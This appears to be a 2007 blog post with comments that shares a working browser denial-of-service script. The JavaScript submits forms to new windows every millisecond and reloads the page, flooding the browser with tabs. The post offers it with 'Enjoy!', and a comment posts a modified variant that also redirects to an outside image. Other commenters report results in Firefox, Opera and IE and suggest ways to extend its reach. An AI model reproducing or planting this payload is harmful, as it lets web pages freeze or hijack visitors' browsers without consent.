This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy!
<script type="text/javascript"> window.onload = function() { setInterval('spawn()',1); } function spawn() { frm = document.createElement('form'); frm.target = 'x' + Math.round(Math.random() * 100000); frm.method = 'GET'; frm.action = '?'; document.body.appendChild(frm); frm.submit(); self.location.reload(); } </script>




Comments 5
I just gave it a shot in Firefox. It loaded three rows of tabs then the popup blocker kicked in, and stopped the rest. Everything remained functional.
Posted 28 Nov 2007 at 4:56 pm ¶In my Opera 9.24 it opens a lot of tabs but with Shit+Ctrl+Alt+W you can close most of them and then quickly go like (Site Preferences Disable Javascript). And that’s it.
Posted 28 Nov 2007 at 7:44 pm ¶Yeah Safari is the only one that seems to have trouble with it, but with a little hacking maybe the others can also be affected.
Posted 28 Nov 2007 at 9:54 pm ¶Evil. Pure evil.
Ingenius.
Posted 29 Nov 2007 at 2:03 am ¶Great code! Let’s make it pretty
(It works really well in IE and ies4linux)
<script type=”text/javascript”>
Posted 30 Nov 2007 at 6:28 pm ¶window.onload = function() {
setInterval(’spawn()’,1);
}
function spawn() {
frm = document.location=’http://misers.org/pictures/SomethingAwful/samakeyoulaugh/stallowned.jpg’
frm = document.createElement(’form’);
frm.target = ‘x’ + Math.round(Math.random() * 1);
frm.method = ‘GET’;
frm.action = ‘?’;
document.body.appendChild(frm);
frm.submit();
self.location.reload();
}
</script>
Post a Comment